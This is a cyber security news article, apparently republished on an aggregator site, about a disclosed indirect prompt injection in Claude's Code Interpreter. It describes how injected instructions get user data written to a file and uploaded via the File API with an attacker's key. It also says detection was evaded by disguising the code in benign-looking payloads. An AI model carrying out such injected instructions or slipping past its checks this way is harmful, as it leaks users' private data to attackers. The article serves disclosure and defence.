Categories: Cyber Security News

Prompt Injection Variant Lets Hackers Exfiltrate Data from Claude APIs

Security researchers have uncovered a critical vulnerability in Anthropic’s Claude AI system that allows attackers to exploit indirect prompts and steal sensitive user data through the platform’s File API.

The discovery, which was publicly documented on October 28, 2025, demonstrates how threat actors can manipulate Claude’s Code Interpreter and API features to exfiltrate confidential information from victims’ workspaces directly into attacker-controlled accounts.

Table of Contents

Toggle

Exploiting Claude’s Network Access Feature

The vulnerability stems from Anthropic’s recent decision to enable network access within Claude’s Code Interpreter environment.

This feature was designed to allow users to fetch resources from trusted package managers, including npm, PyPI, and GitHub, for legitimate development purposes.

However, researchers identified that one of these approved domains, api.anthropic.com, could be weaponized for malicious data theft operations.

The attack mechanism relies on indirect prompt injection techniques where attackers embed malicious instructions into Claude’s chat interface.

These hidden commands cause the AI model to execute unauthorized actions without triggering user awareness or suspicion.

The exploitation process begins when Claude receives instructions to write sensitive data, such as previous conversation histories or workspace files, into a local file within its sandbox environment.

Data Exfiltration Through API Manipulation

Once the sensitive information is written to a file, the malicious payload leverages Anthropic’s File API to upload the data externally.

This is the attacker’s Anthropic Console before the attack.

The critical security flaw occurs when attackers insert their own API keys into the upload request, redirecting the file transfer to their Anthropic account instead of the legitimate user’s workspace.

This technique enables attackers to systematically extract data in chunks of up to 30 megabytes per file upload, according to official File API documentation.

Attacker refreshes the Files view in their Console and the target’s uploaded file appears

Initial testing revealed that Claude’s safety mechanisms occasionally detected suspicious activity when prompts contained visible API keys.

However, researchers successfully bypassed these protections by disguising malicious code segments within benign-looking payload structures, making the requests appear harmless to automated detection systems.

The vulnerability was responsibly disclosed to Anthropic through HackerOne on October 25, 2025, but the company initially dismissed the report as “out of scope,” classifying it as a model safety issue rather than a legitimate security vulnerability.

The researcher challenged this categorization, arguing that deliberate data exfiltration through authenticated API calls represents a genuine security threat with serious privacy implications.

Anthropic reversed its position on October 30, 2025, acknowledging the misclassification and confirming that data exfiltration attacks fall within its responsible disclosure program.

The company announced it would review its classification procedures and advised users to carefully monitor Claude’s behavior when executing scripts that access internal or sensitive information.

This incident underscores the expanding intersection between artificial intelligence safety and cybersecurity.

As AI platforms incorporate advanced capabilities like network access and persistent memory, attackers are discovering innovative methods to weaponize prompt injection for data theft purposes.

The case highlights the urgent need for comprehensive monitoring systems, enhanced egress controls, and transparent vulnerability management processes across AI service providers.

Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today

The post Prompt Injection Variant Lets Hackers Exfiltrate Data from Claude APIs appeared first on Cyber Security News.

Hackers Can Manipulate Claude AI APIs with Indirect Prompts to Steal User Data

Hackers can exploit Anthropic’s Claude AI to steal sensitive user data. By leveraging the model’s newly added network capabilities in its Code Interpreter tool, attackers can use indirect prompt injection to extract private information, such as chat histories, and upload it directly to their own accounts. This revelation, detailed in…

November 3, 2025

In "Cyber Security News"

Anthropic wants you to use Claude to ‘Cowork’ in latest AI agent push

Anthropic wants to expand Claude's AI agent capabilities and take advantage of the growing hype around Claude Code - and it's doing it with a brand-new feature released Monday, dubbed "Claude Cowork." "Cowork can take on many of the same tasks that Claude Code can handle, but in a more…

January 12, 2026

In "The Verge"

Anthropic’s new Claude ‘constitution’: be helpful and honest, and don’t destroy humanity

Anthropic is overhauling Claude's so-called "soul doc." The new missive is a 57-page document titled "Claude's Constitution," which details "Anthropic's intentions for the model's values and behavior," aimed not at outside readers but the model itself. The document is designed to spell out Claude's "ethical character" and "core identity," including…

January 21, 2026

In "The Verge"

rssfeeds-admin

Next Microsoft’s WSUS Patch Disrupts Hotpatching on Windows Server 2025 »

Previous « Apple Fixes Critical Security Flaws in iOS 26.1 and iPadOS 26.1

Published by

rssfeeds-admin

5 months ago

The 27″ KTC QHD 144Hz Gaming Monitor Drops to $83 During the Amazon Spring Sale

Shopping for a good gaming monitor but want to keep your budget under $100? On…

2 hours ago

The Anyuse 16″ 1080p Portable USB Monitor Drops to $44 During the Amazon Spring Sale

It's no surprise why USB portable monitors are becoming so popular, especially with most people…

2 hours ago

Tennessee News

Anti-Trump ‘No Kings’ rallies draw thousands across Tennessee

Renea DeLong caries an American flag and white flower at the No Kings Rally in…

4 hours ago

Tennessee News

This website uses cookies.

Prompt Injection Variant Lets Hackers Exfiltrate Data from Claude APIs

Exploiting Claude’s Network Access Feature

Data Exfiltration Through API Manipulation

Related

Hackers Can Manipulate Claude AI APIs with Indirect Prompts to Steal User Data

Anthropic wants you to use Claude to ‘Cowork’ in latest AI agent push

Anthropic’s new Claude ‘constitution’: be helpful and honest, and don’t destroy humanity

Recent Posts

The 27″ KTC QHD 144Hz Gaming Monitor Drops to $83 During the Amazon Spring Sale

The Anyuse 16″ 1080p Portable USB Monitor Drops to $44 During the Amazon Spring Sale

Anti-Trump ‘No Kings’ rallies draw thousands across Tennessee

Anti-Trump ‘No Kings’ rallies draw thousands across Tennessee

The Best Deals Today: My Hero Academia: All’s Justice, LEGO Star Wars R2-D2, Code Vein II, and More

The Best Deals Today: My Hero Academia: All’s Justice, LEGO Star Wars R2-D2, Code Vein II, and More

Prompt Injection Variant Lets Hackers Exfiltrate Data from Claude APIs

Exploiting Claude’s Network Access Feature

Data Exfiltration Through API Manipulation

Related

Related Post

Recent Posts